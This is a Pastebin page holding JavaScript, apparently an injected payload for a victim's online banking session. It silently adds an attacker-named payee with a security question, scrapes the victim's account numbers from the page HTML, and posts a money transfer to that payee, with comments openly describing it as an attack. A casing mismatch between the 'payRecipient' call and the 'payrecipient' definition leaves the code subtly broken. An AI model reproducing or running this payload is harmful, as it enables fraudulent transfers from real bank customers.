Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //Define the variables for who we want to give money to
- var my_first_name = 'Steve'; //first name
- var my_last_name = 'Meacham'; //last name
- var my_email = 'pastebinjunk@stevemeacham.me'; //email address
- var security_question = 'my company'; //security question for money transfer
- var security_answer = 'Meacham & Meacham'; //response to security question no spaces allowed
- var today_day = '31'; //today's day
- var today_month = '7'; //today's month
- var today_year = '2013'; //today's year
- var my_amount = '20'; //amount you want to transfer. Must be at least $10
- var from_account; // variable to hold the 'from' account for posting transfer request
- var to_account; //variable to hold the 'to' account for posting transfer
- var current_server_response; //not used
- //generic HTTPObject - can be extended to include IE support
- function getHTTPObject() {
- var xmlhttp2;
- if (!xmlhttp2 && typeof XMLHttpRequest != 'undefined') {
- try {
- xmlhttp2 = new XMLHttpRequest();
- } catch (e) {
- xmlhttp2 = false;
- }
- }
- return xmlhttp2;
- }
- addRecipient(); //adds malicious recipient
- payRecipient(); //pays malicious recipient
- //function to add recipient
- function addRecipient () {
- //First go to payments page
- sendBankRequest('banksecure/funcs/mainBalance','REQUESTYPE=CheckBalance&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
- //Now go to add recipient page
- sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
- //Enter in the info for the recipient that you want to add and give the security question and answer
- sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=addNewRecipient&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer);
- //Verify the details of the request
- sendBankRequest('banksecure/funcs/payFnds', 'REQUESTYPE=verifyRequest&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&NAME= ' + my_first_name + '+' + my_last_name + '&EMAIL=' + my_email + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');
- //recipient is added!
- }
- function payrecipient() {
- var resp;
- //Send a request to do an online payment
- resp = sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=StartPaymentScreen&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0');
- //Parse out the response to find the unique account values for 'to' and 'from'
- parseResponseSendrecipient (resp);
- //make payment request
- sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=MakePayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once');
- //confirm payment details
- sendBankRequest('banksecure/funcs/onlinePayments','REQUESTYPE=ConfirmPayment&LANGUAGE=EN&SVTKN=x1z77v&BHT1=0&AMOUNT=' + my_amount +'&FROM_ACCT=' + from_account + '&TO_ACCNT=' + to_account + '&DAY=' + today_day +'&MONTH=' + today_month + '&YEAR=' + today_year + '&FREQUENCY=once' + '&QUESTION=' + security_question + '&ANSWER=' + security_answer + '&CONFIRM_ANSWER=' + security_answer + '&VERIFY_RSPNS=OK');
- //Payment sent!
- }
- //Function to send request to bank
- function sendBankRequest(my_page, my_post_params) {
- //the object that makes it all possible!
- var xmlhttp = getHTTPObject();
- // note the third argument is whether or not the call will be 'asynchronous' - by specifying false we are blocking for the response.
- // This of course destroys the first 'A' in AJAX but since we are attacking somebody else who the hell cares!
- xmlhttp.open("POST", my_page, false);
- //define headers exactly as they are given in a valid browser-based request
- xmlhttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12');
- xmlhttp.setRequestHeader('Accept-Language','en-us,en;q=0.5');
- xmlhttp.setRequestHeader('Accept-Charset','ISO-8859-1,utf-8;q=0.7,*;q=0.7');
- //more HTTP headers
- xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- //send the request and return the response
- xmlhttp.send(my_post_params);
- return xmlhttp.responseText;
- }
- //Search through specific page for to and from accounts
- //Using this same technique we could pick out an anti-CSRF token
- //Basically this is just parsing HTML
- function parseResponseSendrecipient (my_response) {
- //look through page for the account number they are using for the victim
- var from_index = my_response.indexOf('from_account=\"client_val\"');
- from_account = my_response.substring(from_index + 30,my_response.indexOf('>',from_index) - 2);
- //now we look for the to account
- var to_index = my_response.indexOf(my_first_name + ' ' + my_last_name);
- //estimate that the value can't be more than 40 characters previous to this
- var to_option_index = to_index - 40;
- to_option_index = my_response.indexOf('\"', to_option_index);
- to_account = my_response.substring(to_option_index + 1, to_index - 2);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement